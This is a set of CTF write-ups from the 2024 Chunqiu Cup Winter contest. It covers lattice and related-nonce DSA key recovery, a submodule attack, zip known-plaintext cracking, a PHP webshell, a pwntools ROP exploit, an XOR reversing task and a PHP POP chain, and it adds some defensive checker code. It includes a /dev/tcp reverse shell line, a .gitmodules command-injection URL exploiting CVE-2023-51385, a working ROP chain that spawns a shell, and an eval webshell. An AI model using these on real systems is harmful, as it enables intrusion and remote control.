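2024 Chunqiu Cup Winter Competition: Write-ups for Selected Challenges (ransomware traffic, ichunqiu) (1), A Beginner's Guide to Network Security Plug-ins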

```sage
    # NOTE: this listing starts partway through boneh_durfee();
    # the beginning of the function is not on the page.
    if debug:
        print("looking for independent vectors in the lattice")
    found_polynomials = False

    for pol1_idx in range(nn - 1):
        for pol2_idx in range(pol1_idx + 1, nn):
            # for i and j, create the two polynomials
            PR.<w,z> = PolynomialRing(ZZ)
            pol1 = pol2 = 0
            for jj in range(nn):
                pol1 += monomials[jj](w * z + 1, w, z) * BB[pol1_idx, jj] / monomials[jj](UU, XX, YY)
                pol2 += monomials[jj](w * z + 1, w, z) * BB[pol2_idx, jj] / monomials[jj](UU, XX, YY)

            # resultant
            PR.<q> = PolynomialRing(ZZ)
            rr = pol1.resultant(pol2)

            # are these good polynomials?
            if rr.is_zero() or rr.monomials() == [1]:
                continue
            else:
                print("found them, using vectors", pol1_idx, "and", pol2_idx)
                found_polynomials = True
                break
        if found_polynomials:
            break

    if not found_polynomials:
        print("no independant vectors could be found. This should very rarely happen...")
        return 0, 0

    rr = rr(q, q)

    # solutions
    soly = rr.roots()

    if len(soly) == 0:
        print("Your prediction (delta) is too small")
        return 0, 0

    soly = soly[0][0]
    ss = pol1(q, soly)
    solx = ss.roots()[0][0]

    return solx, soly


# N, e and c come from the challenge data (not shown on this page)
delta = .271  # this means that d < N^delta
m = 8  # size of the lattice (bigger the better/slower)
t = int((1 - 2 * delta) * m)  # optimization from Herrmann and May
X = 2 * floor(N ^ delta)  # this _might_ be too much
Y = floor(N ^ (1 / 2))  # correct if p, q are ~ same size

P.<x,y> = PolynomialRing(ZZ)
A = int((N + 1) / 2)
pol = 1 + x * (A + y)

solx, soly = boneh_durfee(pol, e, m, t, X, Y)
d = int(pol(solx, soly) / e)
print(d)
m = power_mod(c, d, N)
```

This yields

a=24601959430759983424400804734518943158892550216065342062971649989571838687333

Use the known data to mount a related-k (related-nonce) attack.

```python
from Crypto.Util.number import *

# Coefficients of the linear nonce relation assumed by the formula below: k2 = a*k1 + b (mod q)
a=24601959430759983424400804734518943158892550216065342062971649989571838687333
b=17474742587088593627

# DSA public parameters and public key
p= 161310487790785086482919800040790794252181955976860261806376528825054571226885460699399582301663712128659872558133023114896223014064381772944582265101778076462675402208451386747128794418362648706087358197370036248544508513485401475977401111270352593919906650855268709958151310928767086591887892397722958234379
q= 1115861146902610160756777713087325311747309309771
g= 61073566757714587321114447684333928353300944355112378054603585955730395524359123615359185275743626350773632555967063692889668342544616165017003197599818881844811647270423070958521148291118914198811187731689123176313367399492561288350530256722898205674043032421874788802819858438796795768177550638273020791962
y= 23678147495254433946472657196764372220306841739888385605070426528738230369489739339976134564575544246606937803367113623097260181789372915552172469427842482448570540429192377881186772226796452797182435452490307834205012154495575570994963829345053331967442452842152258650027916313982835119514473311305158299360

# Two signatures (message hash, r, s) made with related nonces
(h1, r1, s1) = 535874494834828755542711401117152397489711233142, 117859946800380767356190121030392492081340616512, 26966646740134065096660259687229179143947213779
(h2, r2, s2) = 236574518096866758760287021848258048065293279716, 863199000523521111517835459866422731857447792677, 517924607931342012033031470185302567344725962419

# Eliminate x from s1*k = h1 + x*r1 and s2*(a*k + b) = h2 + x*r2 to solve for k, then for x
k = (h1*r2 - h2*r1 + b*s2*r1) * inverse(s1*r2 - a*s2*r1, q) % q
x = (k*s1 - h1) * inverse(r1, q) %q

print(long_to_bytes(x))
```

This gives the final flag.

Flag: flag{l1near_k1s_unsafe}
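The key recovery above works because the nonces of the two signatures satisfy a linear relation. The following added example (not part of the original write-up) reproduces it on a toy DSA group and shows that the same algebra no longer yields the key once the second nonce is independent, which is why DSA nonces must be unrelated and unpredictable. The relation k2 = a*k1 + b, the group parameters and all secrets are constructed assumptions.

```python
def is_prime(n):
    if n < 2 or n % 2 == 0:
        return n == 2
    f = 3
    while f * f <= n:
        if n % f == 0:
            return False
        f += 2
    return True

def make_group(q):
    """Find a prime p = 2*j*q + 1 and a generator g of the order-q subgroup."""
    j = 1
    while not is_prime(2 * j * q + 1):
        j += 1
    p = 2 * j * q + 1
    h = 2
    while pow(h, (p - 1) // q, p) == 1:
        h += 1
    return p, pow(h, (p - 1) // q, p)

Q = 2**31 - 1            # Mersenne prime; toy size, far too small for real use
P, G = make_group(Q)

def sign(h, k, x):
    """Textbook DSA signature on hash value h with a caller-chosen nonce k."""
    r = pow(G, k, P) % Q
    s = pow(k, -1, Q) * (h + x * r) % Q
    return r, s

def recover_key(sig1, sig2, a, b):
    """Solve for x assuming k2 = a*k1 + b (mod Q), using the write-up's formula."""
    (h1, r1, s1), (h2, r2, s2) = sig1, sig2
    k = (h1 * r2 - h2 * r1 + b * s2 * r1) * pow(s1 * r2 - a * s2 * r1, -1, Q) % Q
    return (k * s1 - h1) * pow(r1, -1, Q) % Q

def demo(k2_is_related):
    """Return True if the recovered candidate matches the public key y."""
    x, k1, a, b = 123456789, 987654321, 31337, 4242     # constructed secrets
    y = pow(G, x, P)
    k2 = (a * k1 + b) % Q if k2_is_related else 1357924680
    h1, h2 = 1111111, 2222222                           # stand-ins for message hashes
    sig1 = (h1, *sign(h1, k1, x))
    sig2 = (h2, *sign(h2, k2, x))
    candidate = recover_key(sig1, sig2, a, b)
    return pow(G, candidate, P) == y
```

`demo(True)` recovers the private key from two signatures alone; `demo(False)` uses an unrelated second nonce and the candidate fails the public-key check.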
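Challenge: MISC (modules)
Steps:

Following the challenge hint, find the repository on GitHub; because the target machine cannot reach GitHub, fork it to GitLab.

Add a file exp.sh to the repository:

```bash
bash -i >& /dev/tcp/<IP address>/<port> 0>&1
```

This is a reverse shell.

Listen on the server.

Modify the .gitmodules file in the repository: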

```ini
[submodule "cve"]
    path = cve
    url = ssh://`bash exp.sh`foo.ichunqiu.com/bar
```

Finally, enter the repository address on the target machine:

u test / CVE-2023-51385_test · GitLab

```bash
git clone https://gitlab.com/testu2584/CVE-2023-51385_test.git --recurse-submodules
```

That is all that is needed.

Flag: flag{ec993bca-5790-4b17-9830-785079885277}
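For reviewing a repository before a recursive clone, this added example (not from the original write-up, Git or OpenSSH) flags submodule URLs whose SSH user or host part contains shell metacharacters, the pattern used in the .gitmodules above. The character set, function names and sample file are constructed assumptions.

```python
import re

# Characters a shell treats specially; none belongs in an SSH user or host name.
SHELL_META = re.compile(r"""['`"$\\;&<>|(){}\s]""")
SSH_URL = re.compile(r"^(?:ssh|git\+ssh|ssh\+git)://([^/]*)")
SCP_LIKE = re.compile(r"^([^/:]+):")          # user@host:path form

def parse_gitmodules(text):
    """Return [(submodule_name, url)] from .gitmodules content."""
    entries, name = [], None
    for raw in text.splitlines():
        line = raw.strip()
        header = re.match(r'\[submodule\s+"(.*)"\]$', line)
        if header:
            name = header.group(1)
            continue
        url = re.match(r"url\s*=\s*(.*)$", line)
        if url and name is not None:
            entries.append((name, url.group(1)))
    return entries

def ssh_authority(url):
    """Return the user@host[:port] part of an SSH-style URL, or None for other transports."""
    m = SSH_URL.match(url)
    if not m and "://" not in url:
        m = SCP_LIKE.match(url)
    return m.group(1) if m else None

def suspicious_submodules(text):
    """Flag submodules whose SSH user/host has shell metacharacters or a leading '-'."""
    hits = []
    for name, url in parse_gitmodules(text):
        auth = ssh_authority(url)
        if auth and (SHELL_META.search(auth) or auth.startswith("-") or "@-" in auth):
            hits.append((name, url))
    return hits

# Constructed sample: two ordinary submodules and one with a command substitution in the host.
SAMPLE = '''[submodule "lib"]
    path = lib
    url = ssh://git@git.example.com/team/lib.git
[submodule "cve"]
    path = cve
    url = ssh://`echo test`foo.example.com/bar
[submodule "docs"]
    path = docs
    url = https://git.example.com/team/docs.git
'''
```

Running `suspicious_submodules()` over a fetched .gitmodules before `--recurse-submodules` gives a cheap pre-clone check; updating OpenSSH remains the actual fix for CVE-2023-51385.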
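Challenge: MISC (谁偷吃了我的外卖, "Who Ate My Takeout")
Steps:

Use foremost to extract the archive embedded in the image 小凯.jpg.

Looking through the archive, the likely approach is to extract all the file names, sort them by the number in each name, and concatenate the ciphertext fragments that follow the underscore to obtain the full ciphertext.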

```python
import zipfile
import re
import os


def get_filenames_from_zip(zip_path, output_file):
    # zipfile decodes legacy names as cp437; re-decode them as GBK to recover the Chinese names
    with zipfile.ZipFile(zip_path, 'r') as zf:
        filenames = "\n".join([name.encode('cp437').decode('gbk') for name in zf.namelist()])
    with open(output_file, 'w', encoding='utf-8') as f:
        # trailing newline so the last name stays on its own line after sorting
        f.write(filenames + "\n")


zip_path = r"C:\Users\32541\Desktop\外卖箱.zip"
output_file = 'filenames.txt'
get_filenames_from_zip(zip_path, output_file)

with open('filenames.txt', 'r', encoding='utf-8') as f:
    lines = f.readlines()

# Keep only the per-user entries and sort them by the number after '用户'
user_lines = [line for line in lines if line.startswith('外卖箱/用户')]
sorted_user_lines = sorted(user_lines, key=lambda x: int(x.split('用户')[1].split('_')[0]))

with open('sorted_filenames.txt', 'w', encoding='utf-8') as f:
    for line in sorted_user_lines:
        f.write(line)

with open('sorted_filenames.txt', 'r', encoding='utf-8') as file:
    lines = file.readlines()

# Concatenate the fragment between '_' and '的' from each name
result = ''
for line in lines:
    match = re.search(r'_(.*?)的', line)
    if match:
        result += match.group(1)

with open('result.txt', 'w') as file:
    file.write(result)
```

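Finally, following the hint,

replace - with /, Base64-decode the result, and save the output as a file (tool: https://the-x.cn/encodings/Base64.aspx).

Run foremost again on the saved file to obtain a new archive.

Opening the archive gives an error; repair it with an archive tool.

File contents:

Finally, use the file containing 钥匙.png as the known plaintext for a known-plaintext attack on the earlier 外卖箱.zip.

This yields the decrypted zip file.

Open it and go into the flag folder.

View 小凯的奋斗故事.md

to get the first part of the flag: flag{W1sh_y0u_AaaAaaaa

View txt.galf

Reversing it gives the second part of the flag: aaaaaaa_w0nderfu1_CTF_journe9}

The final flag:

Flag: flag{W1sh_y0u_AaaAaaaaaaaaaaa_w0nderfu1_CTF_journe9}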
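Challenge: MISC (明文混淆, "Plaintext Obfuscation")
Steps:

From the challenge description, the archive is likely meant for a known-plaintext attack. The shell file has been obfuscated, which leaves license.txt as the only way in. Other license.txt files found on the computer turned out to have largely the same content, so bkcrack was used to start the known-plaintext attack directly.

7163444a 203b76b0 17de1387

This gives the three keys; extract the files.

Use this site for the first deobfuscation step: UnPHP - The Online PHP Decoder

Copy this segment into shell2.php and replace eval with echo.

This gives the following code: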

```php
?><?php

eval(gzinflate(base64_decode('U0gtS8zRcFCJD/APDolWT8tJTK8uNswt8DGOrzIsiHfIS4kvNzYzzUj1yVFUVKxVj9W0trcDAA==')));

?> eval(@$_POST['flag{s1mpL3_z1p_@nd_w365heLl!!!}']);?>
```

Flag: flag{s1mpL3_z1p_@nd_w365heLl!!!}
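The eval-to-echo step can also be done without running any PHP, which is safer when triaging a suspected webshell. This added example (not from the original write-up) statically peels nested `eval(gzinflate(base64_decode('...')))` layers; the function names are hypothetical and the sample is constructed inside the block, not taken from the challenge.

```python
import base64
import re
import zlib

# One obfuscation layer: eval(gzinflate(base64_decode('<base64>')));
LAYER = re.compile(
    r"""eval\(\s*gzinflate\(\s*base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)\s*\)\s*\)\s*;?"""
)

def peel(php, max_layers=20):
    """Statically unwrap nested layers. Nothing is executed.
    Returns (resulting_source, number_of_layers_removed)."""
    layers = 0
    while layers < max_layers:
        m = LAYER.search(php)
        if not m:
            break
        try:
            # PHP's gzinflate() reads raw DEFLATE, which is wbits=-15 in zlib
            inner = zlib.decompress(base64.b64decode(m.group(1)), -15)
        except (ValueError, zlib.error):
            break                      # not valid base64/DEFLATE: leave it as is
        php = php[:m.start()] + inner.decode("utf-8", "replace") + php[m.end():]
        layers += 1
    return php, layers

def wrap(php):
    """Build one layer the way the obfuscator would (only used to construct the sample)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(php.encode()) + comp.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()

# Constructed sample: a harmless statement wrapped three times
SAMPLE_INNER = "echo 'constructed sample payload';"
SAMPLE = "<?php " + wrap(wrap(wrap(SAMPLE_INNER))) + " ?>"
```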
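Challenge: PWN (nmanager)
Steps:

Download the attachment and analyze it.

It is a 64-bit binary with Canary and NX protections enabled; load it into 64-bit IDA to decompile it.

Write the exploit: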

```python
from ctypes import *
from pwn import *
import time

io = remote('ip', port)  # placeholders: target address and port

# Seed the local libc rand() with the current time and send the character it selects
dl = CDLL('./libc.so.6')
dl.srand(int(time.time()))
c = list('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')
c = c[dl.rand() % 62]
io.sendline(str(c))

# First modify request with index -1
io.recvuntil('modify')
io.sendline(str(-1))
io.recvuntil('gender: ')
io.send('A' * 8)
io.recvuntil('age: ')
io.sendline(p64(0x4142))
io.recvuntil('name: ')
io.send('B')

# Read the 6 bytes echoed after the 'A' padding and subtract the fixed offset to get the libc base
io.recvuntil('A' * 0x8)
libc_base = u64(io.recv(6) + b'\x00' * 2) - 528426
libc = ELF('libc.so.6')
io.recvuntil(')')
io.sendline('n')

# Build the ROP chain: pop rdi; "/bin/sh"; system
pop_rdi = rdi = libc_base + 0x2a3e5
ret = pop_rdi + 1
system = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
pay = p64(pop_rdi) + p64(bin_sh) + p64(system)

# Second modify request with index -1 delivers the chain
io.recvuntil('modify')
io.sendline(str(-1))
io.recvuntil('gender: ')
io.send('C' * 10)
io.recvuntil('age: ')
io.sendline(p64(ret))
io.recvuntil('name: ')
io.send(b'A' * 7 + p64(ret) * 3 + pay)

io.interactive()
```

This gets the flag.

Flag: flag{46d45ed7-f76b-4d3b-9095-360c434844cb}
Challenge: RE (UPX2023)
Steps:

```python
key = [111, 24, 236, 196, 58, 186, 93, 97, 61, 51, 169, 170, 2, 17, 113, 139, 162, 38, 14, 77, 131, 66, 112, 202, 80, 113, 231, 107, 15, 50, 159, 128, 155, 183, 227, 184, 224, 28, 16, 180, 42, 57]

flag = [0x09, 0x63, 0xD9, 0xF6, 0x58, 0xDD, 0x3F, 0x4C, 0x0F, 0x0B, 0x98, 0xC6, 0x65, 0x21, 0x41, 0xED, 0xC4, 0x0B, 0x3A, 0x7B, 0xE5, 0x75, 0x5D, 0xA9, 0x31, 0x41, 0xD7, 0x52, 0x6C, 0x0A, 0xFA, 0xFD, 0xFA, 0x84, 0xDB, 0x89, 0xCD, 0x7E, 0x27, 0x85, 0x13, 8]

string1 = 'QAZWSXEDCRFVTGBYHNUJMIKOLP0987654321{}-!@#'
string2 = 'QV4TAG3BZY2HWN1USJ{MXI}KEO-LDP!0C9@8R7#6F5'

# XOR each encrypted byte with the key byte at the same position
sx = ''
for i in range(len(flag)):
    sx += chr(flag[i] ^ (key[i]))

# Reorder the result: for each character of string2, take the byte at that character's index in string1
for i in string2:
    print(sx[string1.index(i)], end='')
```

Flag: flag{0305f8f2-14b6-fg7b-bc7a-010299c881e1}
Challenge: WEB (ezezez_php)
Steps:

From reading the challenge, this is a POP chain problem. The chain is:

`Ha->__destruct()->Rd->__call()->Er->__set($name, $value)->get($url)`

Exp:

```php
<?php
highlight_file(__FILE__);
include "function.php";

class Rd
{
    public $ending;
    public $cl;
    public $poc;

    public function __destruct()
    {
        echo "All matters have concluded" . "";
    }

    public function __call($name, $arg)
    {
        foreach ($arg as $key => $value) {
            if ($arg[0]['POC'] == "0.o") {
                $this->cl->var1 = "get";
            }
        }
    }
}

class Poc
{
    public $payload;
    public $fun;

    public function __set($name, $value)
    {
        $this->payload = $name;
        $this->fun = $value;
    }

    function getflag($paylaod)
    {
        echo "Have you genuinely accomplished what you set out to do?" . "";
        file_get_contents($paylaod);
    }
}

class Er
{
    public $symbol;
    public $Flag;

    public function __construct()
    {
        $this->symbol = True;
    }

    public function __set($name, $value)
    {
        if (preg_match('/^(file|http|https|gopher|dict)?:\/\/.*(\/)?.*$/', base64_decode($this->Flag))) {
            $value($this->Flag);
        } else {
            echo "NoNoNo,please you can look hint.php" . "";
        }
    }
}

class Ha
{
    public $start;
    public $start1;
    public $start2;

    public function __construct()
    {
        echo $this->start1 . "__construct" . "";
    }

    public function __destruct()
    {
        // the listing is cut off at this point in the source page
    }
}
```